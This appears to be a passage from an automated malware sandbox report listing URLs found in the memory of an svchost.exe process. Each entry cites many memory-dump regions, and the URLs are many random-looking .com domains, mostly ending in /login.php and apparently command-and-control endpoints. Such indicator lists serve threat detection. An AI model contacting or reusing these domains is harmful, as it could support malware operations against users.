    Source: svchost.exe, 00000001.00000003.2799485935.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2800682376.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2794121889.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2793808269.000000000089F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2505929532.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2800540178.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2791148605.00000000072F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2518441386.000000000BE82000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2507273692.000000000BE83000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2800431659.00000000072F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujyteq.com/login.php
    Source: svchost.exe, 00000001.00000003.2573059018.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2570181006.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2835961971.000000000BE82000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2571621113.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2568700922.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2572739262.0000000007230000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujytug.com/login.php
    Source: svchost.exe, 00000001.00000003.2799485935.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2800682376.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2794121889.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2508047808.000000000721E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2519971572.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2508663106.00000000073A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2518439898.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2508663106.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2519517368.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2505929532.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2800540178.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2791148605.00000000072F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2807723394.000000000BE0C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2800431659.00000000072F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumybal.com/login.php
    Source: svchost.exe, 00000001.00000003.2573059018.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2837727228.000000000BE0C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2570181006.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2571621113.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2568700922.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2572739262.0000000007230000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumybuq.com/login.php
    Source: svchost.exe, 00000001.00000003.2809672736.0000000005F9B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2518500900.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2520694220.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2530012811.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2520541717.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2802658377.0000000005F9A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2519802844.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2519384142.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2803364591.0000000005F9C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2522775784.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2523240921.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2528389580.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2526234256.0000000007345000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumycug.com/login.php
    Source: svchost.exe, 00000001.00000003.2573059018.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2577542227.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2570181006.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2571621113.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2568700922.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2572739262.0000000007230000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2580215394.00000000072F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumygil.com/login.php
    Source: svchost.exe, 00000001.00000003.2508205783.000000000724F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2508047808.000000000721E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2507889321.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2519971572.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2518439898.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2508663106.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2519517368.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2505929532.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2504504034.0000000007239000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2792642908.0000000007252000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2505675596.0000000007241000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2793548404.000000000BE82000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2807723394.000000000BE0C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2507383572.000000000724E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumygyp.com/login.php
    Source: svchost.exe, 00000001.00000003.2561438521.000000000BE1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumyjev.com/
    Source: svchost.exe, 00000001.00000003.2561438521.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2832397817.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2828658186.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2570181006.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2571621113.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2826870252.00000000072F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2568700922.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2827527666.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2572739262.0000000007230000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2832232982.00000000072F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumyjev.com/login.php
    Source: svchost.exe, 00000001.00000003.2854980925.0000000007234000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2612600338.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2617522369.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2613157948.000000000089F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2613870670.000000000BEC4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2617620564.000000000BEC5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2988300746.000000000BE53000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumyleg.com/login.php
    Source: svchost.exe, 00000001.00000003.2561990237.000000000721A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2570181006.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2571621113.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2557275920.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2574290902.000000000721A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2568700922.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2572739262.0000000007230000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2556143738.0000000007389000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzyduq.com/login.php
    Source: svchost.exe, 00000001.00000003.2819905247.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2823353061.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2822601905.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2822384079.00000000072F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2536562321.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2557983438.000000000BE0C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2546077981.000000000BE0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzygop.com/login.php
    Source: svchost.exe, 00000001.00000003.2819905247.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2823353061.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2822601905.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2822384079.00000000072F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzygop.com/login.php8
    Source: svchost.exe, 00000001.00000003.2477919683.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2770480455.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483592677.000000000BE83000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2770976784.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2771944825.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2767985121.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2771679964.0000000007337000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2767316843.000000000721A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzyguv.com/login.php
    Source: svchost.exe, 00000001.00000003.2613993664.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2854980925.0000000007234000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2612600338.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2617522369.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2988300746.000000000BE53000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzygyl.com/login.php
    Source: svchost.exe, 00000001.00000003.2809672736.0000000005F9B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2811252101.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2523070283.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2809902914.000000000733B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzylol.com/login.php
    Source: svchost.exe, 00000001.00000003.2799485935.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2800682376.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2794121889.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2508047808.000000000721E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2519971572.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2518439898.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2794122039.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2508663106.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2519517368.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2505929532.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2800540178.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2791148605.00000000072F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2795311050.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2800431659.00000000072F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzypug.com/login.php
    Source: svchost.exe, 00000001.00000003.2859933984.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2854943303.00000000072F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2848730732.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2856497680.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2837727228.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2577145365.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2581882189.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2839455732.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2837692038.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2980543727.00000000072F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzytul.com/login.php
    Source: svchost.exe, 00000001.00000003.2841115094.000000000721B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzywag.com/
    Source: svchost.exe, 00000001.00000003.2573059018.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2837727228.000000000BE0C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2570181006.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2574433458.000000000BE0C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2571621113.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2568700922.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2572739262.0000000007230000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebyfup.com/login.php
    Source: svchost.exe, 00000001.00000003.2477919683.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483592677.000000000BE83000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2768207136.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2494764466.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2766393169.0000000007234000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebykap.com/login.php
    Source: svchost.exe, 00000001.00000003.2613993664.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2980870910.000000000733C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2867450379.000000000733B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2612600338.0000000007236000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebykoq.com/login.php
    Source: svchost.exe, 00000001.00000003.2536042650.00000000073DE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2533385713.00000000073DE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2532105233.00000000073DE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2545206078.00000000073DF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2535694034.00000000073DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebykul.com/H
    Source: svchost.exe, 00000001.00000003.2599492010.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2595308643.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2867102202.000000000BE5A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2593794068.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2593784871.0000000007236000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebylyp.com/login.php
    Source: svchost.exe, 00000001.00000003.2599492010.000000000BE1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebylyp.com/login.php?
    Source: svchost.exe, 00000001.00000003.2562078765.00000000073B1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2832397817.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2573206661.000000000BE83000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2828658186.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2556143738.00000000073B1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2826870252.00000000072F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2827527666.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2832232982.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2556143738.0000000007389000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebyniv.com/login.php
    Source: svchost.exe, 00000001.00000003.2821289704.00000000073B1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2535357779.000000000735E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2574433458.000000000BE0C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2536562321.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2824083108.000000000733B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2557983438.000000000BE0C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2546077981.000000000BE0D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2535691969.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2535691969.000000000735E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebyqeq.com/login.php
    Source: svchost.exe, 00000001.00000003.2854980925.0000000007234000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2860106956.0000000007234000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2979657667.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2612600338.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2617522369.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2613157948.000000000089F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebyqig.com/login.php
    Source: svchost.exe, 00000001.00000003.2600006940.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2593785629.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2598474329.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2595314398.00000000072F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebyrel.com/login.php
    Source: svchost.exe, 00000001.00000003.2711276062.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2708292278.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2203162819.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2736714375.0000000007235000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2204802047.000000000721D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2204593821.000000000721A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2204530613.00000000073B1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2204890012.000000000BE82000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2202811783.00000000073B1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2712067298.000000000BE1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebyrev.com/login.php
    Source: svchost.exe, 00000001.00000003.2815248355.00000000072E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2819905247.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2815757354.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2823353061.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2808677418.00000000072F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2533383736.000000000721A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2811000740.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2822601905.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2523370839.000000000721E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2811252101.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2822384079.00000000072F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2814479202.00000000072F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2809428252.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2808839398.00000000072F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebyteg.com/login.php
    Source: svchost.exe, 00000001.00000003.2590518762.00000000073DF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2585304619.00000000073DE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2585044944.000000000738D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebytuv.com/
    Source: svchost.exe, 00000001.00000003.2586486383.00000000072E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2589232221.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2588833082.00000000072E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2585306164.00000000072E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebytuv.com/login.php
    Source: svchost.exe, 00000001.00000003.2799485935.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2800682376.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2794121889.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2793808269.000000000089F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2508663106.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2800540178.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2792642908.0000000007252000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2791148605.00000000072F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2800431659.00000000072F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebyvop.com/login.php
    Source: svchost.exe, 00000001.00000003.2573059018.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2570181006.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2835961971.000000000BE82000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2571621113.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2568700922.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2833294721.00000000072F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2572739262.0000000007230000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebyvyl.com/login.php
    Source: svchost.exe, 00000001.00000003.2859933984.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2854943303.00000000072F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2848730732.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2856497680.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2837727228.000000000BE0C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2577145365.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2839455732.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2837692038.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2980543727.00000000072F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qedyhiq.com/login.php
    Source: svchost.exe, 00000001.00000003.2809672736.0000000005F9B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2518500900.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2520694220.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2520541717.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2802658377.0000000005F9A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2519802844.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2519384142.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2803364591.0000000005F9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qedyhyl.com/login.php
    Source: svchost.exe, 00000001.00000003.2573059018.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2570181006.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2571621113.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2568700922.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2572739262.0000000007230000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qedykep.com/login.php
